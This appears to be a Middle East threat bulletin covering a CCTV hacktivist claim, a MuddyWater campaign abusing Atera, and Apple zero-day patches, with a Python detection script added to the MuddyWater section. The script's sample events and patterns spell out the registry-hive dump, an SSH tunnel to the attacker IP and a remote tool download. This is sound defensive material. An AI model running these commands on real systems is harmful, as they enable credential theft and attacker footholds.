Top Middle East Cyber Threats – December 3rd, 2024
At Help AG, our Managed Security Services (MSS) team offers 24x7x365 monitoring of complex IT security infrastructures to some of the largest enterprises in the region. As a result, we have our eyes keenly fixed on the cybersecurity threat landscape and are among the first in the region to learn and act upon new threats.
ShadowDefenders Hacktivist Group Exposes Vulnerabilities in UAE CCTV Systems
The ShadowDefenders hacktivist group has publicly claimed responsibility for hacking into CCTV systems in the UAE, asserting that they have gained full control over the compromised devices.
The group’s actions are reportedly driven by activism, targeting the UAE as part of their broader hacktivist agenda. These compromises highlight significant vulnerabilities and weak authentication in IoT devices, particularly CCTV systems, underscoring the urgent need for robust security measures.
The hacktivist group’s ability to control CCTV systems poses several risks:
- Privacy Violations: Unauthorized access to sensitive camera feeds.
- Operational Disruptions: Disabling or tampering with critical security infrastructure.
- Reputation Damage: Public disclosure of compromised systems undermines trust in affected organizations.
- Escalation Risks: Exploited devices could serve as entry points for further cyberattacks, such as DDoS attacks or data breaches.
RECOMMENDATIONS
- Ensure all systems are patched and updated.
- Replace passwords and implement strong authentication, including MFA where supported.
- Restrict management access to authorized sources only.
- Monitor your network for abnormal behavior and unauthorized access attempts, particularly from outside the country.
MuddyWater Campaign Exploits RMM Software for Post-Compromise Attacks
Researchers have identified a campaign known as MuddyWater (tracked as STAC 1171 by Sophos). The campaign uses targeted phishing to deliver Atera, a legitimate remote monitoring and management (RMM) tool, which the attackers then use as a foothold for post-compromise activity. Sophos has observed related activity targeting entities around the world.
The campaign begins with phishing emails directing victims to a document-sharing site, hxxps[://]ws[.]onehub[.]com/files/, to download a ZIP file named New Program ICC LTD.zip. This archive contains an installer for the Atera software. Once installed, the attackers leverage Atera’s remote commands to execute a PowerShell script designed to dump credentials and create a SYSTEM registry hive backup. Observed commands include: C:\WINDOWS\system32\reg.exe save HKLM\SYSTEM SystemBkup.hiv.
Post-compromise activities involve domain enumeration, establishing an SSH tunnel to 51.16.209[.]105, and downloading an additional RMM tool from hxxps[:]//downloads.level.io/install_windows.exe. This activity aligns with indicators and TTPs consistent with MuddyWater’s operations.
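The behaviours above (an RMM agent spawning a shell, reg.exe exporting the SYSTEM hive, and the listed network indicators appearing in command lines) can be turned into simple triage rules over process-creation telemetry. The following is an added example, not code from the report or from Sophos; the event records, the AteraAgent.exe path and the field names are constructed assumptions that mimic Sysmon Event ID 1 data.

```python
import re
import ntpath  # handles Windows paths correctly even when run on Linux

# Constructed sample process-creation events (not real telemetry); they mirror
# the TTPs described in the report.
SAMPLE_EVENTS = [
    {"id": 1, "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe", "cmdline": "notepad.exe notes.txt"},
    {"id": 2, "parent": r"C:\Program Files\Atera Networks\AteraAgent\AteraAgent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -NoProfile -File C:\ProgramData\task.ps1"},
    {"id": 3, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\WINDOWS\system32\reg.exe",
     "cmdline": r"C:\WINDOWS\system32\reg.exe save HKLM\SYSTEM SystemBkup.hiv"},
    {"id": 4, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg.exe query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion /v ProgramFilesDir"},
    {"id": 5, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\OpenSSH\ssh.exe",
     "cmdline": "ssh.exe -N user@51.16.209.105"},
    {"id": 6, "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": "curl.exe -o install_windows.exe https://downloads.level.io/install_windows.exe"},
]

RMM_AGENTS = {"ateraagent.exe"}  # assumed agent binary name; extend for the RMM tools you sanction
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# "reg save" of the SYSTEM hive, the exact command observed in the campaign
HIVE_EXPORT = re.compile(r"\bsave\b\s+HKLM\\SYSTEM\b", re.IGNORECASE)
# Network indicators quoted in the report (defanging removed for matching)
CAMPAIGN_IOCS = ("51.16.209.105", "downloads.level.io/install_windows.exe")

def classify(event):
    """Return the names of every rule the event matches (empty list if benign)."""
    parent = ntpath.basename(event["parent"]).lower()
    image = ntpath.basename(event["image"]).lower()
    cmd = event["cmdline"]
    hits = []
    if parent in RMM_AGENTS and image in SHELLS:
        hits.append("rmm_agent_spawned_shell")
    if image == "reg.exe" and HIVE_EXPORT.search(cmd):
        hits.append("system_hive_export")
    if any(ioc in cmd.lower() for ioc in CAMPAIGN_IOCS):
        hits.append("campaign_ioc_in_cmdline")
    return hits

def scan(events):
    """Map event id -> matched rules, keeping only events that fired at least one rule."""
    return {e["id"]: classify(e) for e in events if classify(e)}

if __name__ == "__main__":
    for event_id, rules in scan(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {', '.join(rules)}")
```

The legitimate `reg.exe query` (event 4) and the notepad launch (event 1) produce no alerts, so the rules key on the specific hive export and parent/child pairing rather than on reg.exe or PowerShell alone.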
RECOMMENDATIONS
- Ensure all systems are patched and updated.
- Avoid clicking on or opening untrusted or unknown links, files, or attachments.
- Enforce a strong password policy and ensure the use of MFA.
- Restrict VPN and RDP usage and monitor for suspicious connections.
- Use RBAC and regularly audit privileged accounts.
- Monitor your network for abnormal behaviors and IoCs.
- Ensure frequent backups are in place.
- Educate employees about detecting and reporting phishing or suspicious emails.
Apple Addresses Critical Zero-Day Vulnerabilities in macOS and iOS
Apple has released emergency security updates to address two zero-day vulnerabilities exploited in attacks on Intel-based Mac systems.
The vulnerabilities affect the JavaScriptCore (CVE-2024-44308) and WebKit (CVE-2024-44309) components of macOS Sequoia. The JavaScriptCore vulnerability (CVE-2024-44308) allows attackers to achieve remote code execution through maliciously crafted web content, while the WebKit vulnerability (CVE-2024-44309) enables cross-site scripting attacks.
Apple has resolved these security flaws in macOS Sequoia 15.1.1. Since the affected components are also present in other Apple operating systems, the vulnerabilities have been patched in iOS 17.7.2, iPadOS 17.7.2, iOS 18.1.1, iPadOS 18.1.1, and visionOS 2.1.1.
RECOMMENDATIONS
- Ensure all systems are patched and updated.
References
https://support.apple.com/en-us/121753